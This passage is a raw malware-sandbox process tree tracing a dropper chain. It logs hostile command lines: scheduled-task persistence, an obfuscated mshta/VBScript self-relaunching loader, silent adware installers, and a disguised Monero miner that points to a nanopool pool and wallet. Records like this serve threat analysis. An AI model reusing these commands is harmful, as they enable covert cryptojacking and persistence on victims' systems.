                                                                                                                                                          PID:9020
                                                                                                                                                    • C:\Users\Admin\Documents\cy0KnmvPTz2LfobKt8j2jdwU.exe
                                                                                                                                                      "C:\Users\Admin\Documents\cy0KnmvPTz2LfobKt8j2jdwU.exe"
                                                                                                                                                      5⤵
                                                                                                                                                        PID:7880
                                                                                                                                                      • C:\Users\Admin\Documents\8ONHZ1StitLg6EooXre8T43U.exe
                                                                                                                                                        "C:\Users\Admin\Documents\8ONHZ1StitLg6EooXre8T43U.exe"
                                                                                                                                                        5⤵
                                                                                                                                                          PID:7464
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c Mon1164bf13c51f2c.exe
                                                                                                                                                      3⤵
                                                                                                                                                        PID:864
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\Mon1164bf13c51f2c.exe
                                                                                                                                                          Mon1164bf13c51f2c.exe
                                                                                                                                                          4⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4172
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c Mon114596ddbd42f8.exe
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1680
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c Mon11c710f55e48b36.exe
                                                                                                                                                          3⤵
                                                                                                                                                            PID:648
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c Mon112a4b301b.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                            PID:2328
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c Mon11a9944c09b.exe
                                                                                                                                                            3⤵
                                                                                                                                                              PID:1128
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\Mon114596ddbd42f8.exe
                                                                                                                                                          Mon114596ddbd42f8.exe
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:4220
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-M1ITC.tmp\Mon112a4b301b.tmp
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-M1ITC.tmp\Mon112a4b301b.tmp" /SL5="$30172,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\Mon112a4b301b.exe"
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:4116
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-U3P7K.tmp\Ze2ro.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-U3P7K.tmp\Ze2ro.exe" /S /UID=burnerch2
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4668
                                                                                                                                                              • C:\Program Files\Windows Sidebar\HPHYKJWDPC\ultramediaburner.exe
                                                                                                                                                                "C:\Program Files\Windows Sidebar\HPHYKJWDPC\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:6336
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-D0R0K.tmp\ultramediaburner.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-D0R0K.tmp\ultramediaburner.tmp" /SL5="$20426,281924,62464,C:\Program Files\Windows Sidebar\HPHYKJWDPC\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:6408
                                                                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:6868
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\da-7443b-bea-027a2-5366d9869d39e\Caesheshohajae.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\da-7443b-bea-027a2-5366d9869d39e\Caesheshohajae.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:6440
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\45-2bef4-357-96c97-9dd93ef338532\Tidysojixo.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\45-2bef4-357-96c97-9dd93ef338532\Tidysojixo.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:6604
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fxaehmwg.dp4\GcleanerEU.exe /eufive & exit
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:7448
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\fxaehmwg.dp4\GcleanerEU.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\fxaehmwg.dp4\GcleanerEU.exe /eufive
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:8020
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cdjuidh5.ef2\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:7524
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\cdjuidh5.ef2\installer.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\cdjuidh5.ef2\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:8064
                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\cdjuidh5.ef2\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\cdjuidh5.ef2\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632263602 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:6928
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0d52odxh.mvd\anyname.exe & exit
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:7736
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\0d52odxh.mvd\anyname.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\0d52odxh.mvd\anyname.exe
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:7788
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\45khha01.e3k\gcleaner.exe /mixfive & exit
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:8012
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\45khha01.e3k\gcleaner.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\45khha01.e3k\gcleaner.exe /mixfive
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:5272
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y521cl51.sy5\autosubplayer.exe /S & exit
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:8188
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\y521cl51.sy5\autosubplayer.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\y521cl51.sy5\autosubplayer.exe /S
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:6232
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse6A94.tmp\tempfile.ps1"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:3936
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse6A94.tmp\tempfile.ps1"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:6404
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse6A94.tmp\tempfile.ps1"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:7808
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse6A94.tmp\tempfile.ps1"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:5116
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse6A94.tmp\tempfile.ps1"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:3944
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse6A94.tmp\tempfile.ps1"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:9088
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse6A94.tmp\tempfile.ps1"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:4184
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\Mon11a9944c09b.exe
                                                                                                                                                                                                        Mon11a9944c09b.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:296
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\Mon11c710f55e48b36.exe
                                                                                                                                                                                                        Mon11c710f55e48b36.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:1548
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4600
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:4728
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:6392
                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                      PID:6836
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:2012
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:4276
                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                            PID:7740
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:6572
                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                            C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:868
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:4780
                                                                                                                                                                                                                            • C:\ProgramData\7333822.exe
                                                                                                                                                                                                                              "C:\ProgramData\7333822.exe"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:5180
                                                                                                                                                                                                                              • C:\ProgramData\3840106.exe
                                                                                                                                                                                                                                "C:\ProgramData\3840106.exe"
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:5828
                                                                                                                                                                                                                                  • C:\ProgramData\3840106.exe
                                                                                                                                                                                                                                    "C:\ProgramData\3840106.exe"
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:5412
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 892
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                      PID:5668
                                                                                                                                                                                                                                  • C:\ProgramData\2977210.exe
                                                                                                                                                                                                                                    "C:\ProgramData\2977210.exe"
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:5464
                                                                                                                                                                                                                                    • C:\ProgramData\7568020.exe
                                                                                                                                                                                                                                      "C:\ProgramData\7568020.exe"
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:4212
                                                                                                                                                                                                                                      • C:\ProgramData\5480521.exe
                                                                                                                                                                                                                                        "C:\ProgramData\5480521.exe"
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:5612
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:4864
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 800
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                            PID:6068
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 828
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                            PID:4268
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 892
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                            PID:2468
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 960
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                            PID:5236
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 928
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                            PID:5376
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 1060
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                            PID:6780
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\udptest.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:4968
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:5076
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbsCRIPT: CLOSe ( CREateoBJect ( "wsCRIPT.sHEll" ). RUn( "CMd.ExE /C TYPE ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" > BQRDoAPXV.eXe && STArT bQRdOAPXV.exE -pOMw61vdx0wkZa3aN &if """" == """" for %I In (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ) do taskkill /F /IM ""%~nxI"" " , 0 , tRUe) )
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:4568
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C TYPE "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" > BQRDoAPXV.eXe && STArT bQRdOAPXV.exE -pOMw61vdx0wkZa3aN &if "" == "" for %I In ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ) do taskkill /F /IM "%~nxI"
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                      PID:5600
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BQRDoAPXV.eXe
                                                                                                                                                                                                                                                        bQRdOAPXV.exE -pOMw61vdx0wkZa3aN
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                          PID:4736
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VbsCRIPT: CLOSe ( CREateoBJect ( "wsCRIPT.sHEll" ). RUn( "CMd.ExE /C TYPE ""C:\Users\Admin\AppData\Local\Temp\BQRDoAPXV.eXe"" > BQRDoAPXV.eXe && STArT bQRdOAPXV.exE -pOMw61vdx0wkZa3aN &if ""-pOMw61vdx0wkZa3aN "" == """" for %I In (""C:\Users\Admin\AppData\Local\Temp\BQRDoAPXV.eXe"" ) do taskkill /F /IM ""%~nxI"" " , 0 , tRUe) )
                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                              PID:3876
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C TYPE "C:\Users\Admin\AppData\Local\Temp\BQRDoAPXV.eXe" > BQRDoAPXV.eXe && STArT bQRdOAPXV.exE -pOMw61vdx0wkZa3aN &if "-pOMw61vdx0wkZa3aN " == "" for %I In ("C:\Users\Admin\AppData\Local\Temp\BQRDoAPXV.eXe" ) do taskkill /F /IM "%~nxI"
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:5288
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\rundll32.exe" .\wa3n.AE,EkAXs
                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                  PID:6656
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                taskkill /F /IM "sfx_123_206.exe"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                PID:4268
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecorderF20.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecorderF20.exe"
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:2500
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tmpC9AF_tmp.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\tmpC9AF_tmp.exe"
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:6208
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpC9AF_tmp.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\tmpC9AF_tmp.exe
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:6712
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:4988
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:4648
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:3600
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:5748
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:4368
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\Mon112a4b301b.exe
                                                                                                                                                                                                                                                                      Mon112a4b301b.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:1768
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\6044618.scr
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\6044618.scr" /S
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:4904
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3035026.scr
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3035026.scr" /S
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:4992
                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                          PID:4944
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:4692
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:5396
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-I28UT.tmp\setup_2.tmp
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-I28UT.tmp\setup_2.tmp" /SL5="$302A4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:5732
                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:5388
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-UGC16.tmp\setup_2.tmp
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-UGC16.tmp\setup_2.tmp" /SL5="$30286,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:4788
                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:1380
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:7604
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                        PID:6492
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:6116
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:7932
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:1804
                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 79CF196C42CDE90C77BAB1CD8F44D7AF C
